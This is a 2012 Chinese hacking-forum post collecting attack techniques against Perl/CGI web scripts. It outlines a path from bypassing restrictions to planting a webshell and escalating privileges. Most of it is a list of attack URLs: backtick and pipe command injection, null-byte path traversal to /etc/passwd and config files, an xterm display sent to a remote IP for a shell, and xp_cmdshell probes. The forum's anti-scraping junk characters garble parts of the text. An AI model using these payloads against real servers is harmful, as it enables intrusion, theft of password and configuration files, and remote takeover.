找回密码
 立即注册
查看: 2890|回复: 0
打印 上一主题 下一主题

CGI资料整理

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:56:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
总体思路,跳过限制,查看敏感文件和密码相关文件。写入一句话cgi,进后台试传webshell(后台如果加验证或者MD5过的时候,可以试着    n1 O; |& Z' X* d2 c+ m! @
cookies欺骗,本地提交),寻找可执行的目录和相关函数,拿shell…………》提权  
1 a8 ?3 U5 d, a! {/ Y感谢EMM和ps的睿智和他们高超的脚本技术,还有以前老红4的脚本群英和国外的那些牛淫们  
$ M& l% l  K4 A5 N! s9 V# S& R8 R注“  
- K2 n4 ?$ n. C, S6 Q8 a. nperl脚本的漏洞大多出在open()、system()或者 ’’调用中。前者允许读写和执行,而后两个允许执行。  
" }" W% X0 E2 e; t7 W8 O6 \: M以POST的方法发送表格的话,就不能蒙混过关(%00将不会被解析),所以我们大部分用GET  ( y7 g5 R2 k% b
( a0 X" U, g# E6 _
http://target.com/cgi-bin/home/news/sub.pl?12 随意构造  5 O$ z2 H* D5 b! N( v
http://target.com/cgi-bin/home/news/sub.pl?& 换个字符,也许可以执行呢  
% i" ~& }0 k3 O; M' z. f- Qhttp://target.com/cgi-bin/home/news/sub.pl?`ls` 单引号  
# l: U: ^" ^; o; e& P! ehttp://target.com/cgi-bin/home/news/sub.pl?`id`  2 T" K* @) K0 t7 q0 T& m/ S
http://target.com/cgi-bin/home/news/sub.pl?`IFS=!;uname!-a`  ; W  @, c! ]0 m" u% I" a& U
http://target.com/cgi-bin/home/news/sub.pl?`cat<’/home1/siteadm/cgi-bin/home/news/sub.pl’` 非常好的思路,把代码cat回来显示  $ h6 ]+ D' R, |- a; G) @) k. |. F

) B- w1 p& C1 V5 phttp://target.com/test.pl;ls|  ; f; Z( v2 U$ h  C( X. v
http://target.com/index.cgi?page=|ls+-la+/%0aid%0awhich+xterm|  
2 t6 Z; v. M. v& ?  |% mhttp://target.com/index.cgi?page=|xterm+-isplay+10.0.1.21:0.0+%26|  2 g! E& g  E% ~% p. Y) _
http://target.com/test.pl?’id’ 类似’’内的操作和命令执行自己构造  5 }, x% v; T! U* e2 @- L4 i8 a" {
比如:cat<’/home1/siteadm/cgi-bin/home/news/test.pl’` 把pl代码显示出来。  
; t" i" x- `. nhttp://target.com/index.cgi?page=;dir+c:\|&cid=03417 类似asp的Sql injection  
$ |! g  U& A# U, \1 V" Q* X6 r' b) [6 Q# Y$ F% n' p
http://target.com/test.pl?&........ /../../etc/passwd  $ w+ E8 L  c7 P& b* R6 ~0 S* ]

; h7 h2 E+ F, u4 I1 Hhttp://www.target.org/cgi-bin/cl ... info.pl?user=./test 前面加./  
2 F8 K+ Q, Q+ f7 |. N+ a8 Khttp://www.target.org/cgi-bin/cl ... nfo.pl?user=test%00 注意后面的 %00 别弄丢了  
" i& E, i8 C2 V  ihttp://www.target.org/cgi-bin/cl ... ../../etc/passwd%00  3 O% h1 @% W- k! B0 s$ _4 \6 u

4 d, q6 |7 e' Y6 p9 }http://www.target.org/show.php?f ... /include/config.php 查看php代码  
. M" V! ~2 i; T4 ~+ t- Qhttp://www.target.org/show.php?f ... ng/admin/global.php  / C( l+ G' g; @* r( ^' E! m
7 l' e9 u9 {: l" s/ y
emm和ps的一句话9 X. w6 G, j; G' Y' R' u
8 T5 j# o! \& W) U5 t/ J
http://www.target.org/cgi-bin/cl ... /../../../bin/ls%20  6 |0 r$ b0 j& i. Q) g

% t5 I2 J) _! V( n) }' J>bbb%20|  % l! ^+ ~# r% u
* X- U& H1 j% S, c4 n7 t) u% S
http://www.target.org/cgi-bin/club/scripts\’less showpost.pl\’ 并且寻找(用\’/\’)\’Select\’ 字符串  
: s( o7 I$ k0 {% \+ L7 E+ T
: {* [) j: J  ?1 [. R- ehttp://www.target.org/cgi-bin/cl ... bin/sh.elf?ls+/http 这里的是elf是CCS中文linux操作系统特征  
9 @1 @3 Y$ C- D9 d! J1 Chttp://www.target.org/csapi/..%c0%afhttp/china.sh”+.elf?”+&+ls+/bin  
4 N" ~. ?! b6 c. [& h1 f/ {$ j6 x  x5 q! R6 w
相关html为后缀的脚本技术,继续深挖中,但是不可质疑的是提交数据查询语句也是一种完美的方法  ) ^4 y" |# G+ m5 i- |; ]. f
http://target.com/index.html#cmd.exe  
6 O3 X- @# B9 Y/ c+ D: ehttp://target.com/index.html?dummyparam=xp_cmdshell  , G6 L$ Y2 c3 ]5 s3 H
lynx http://target.com/cgi-bin/htmlscript?../../../../etc/passwd  $ d/ L( r: Q+ }# ?( u' E% R" {* M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表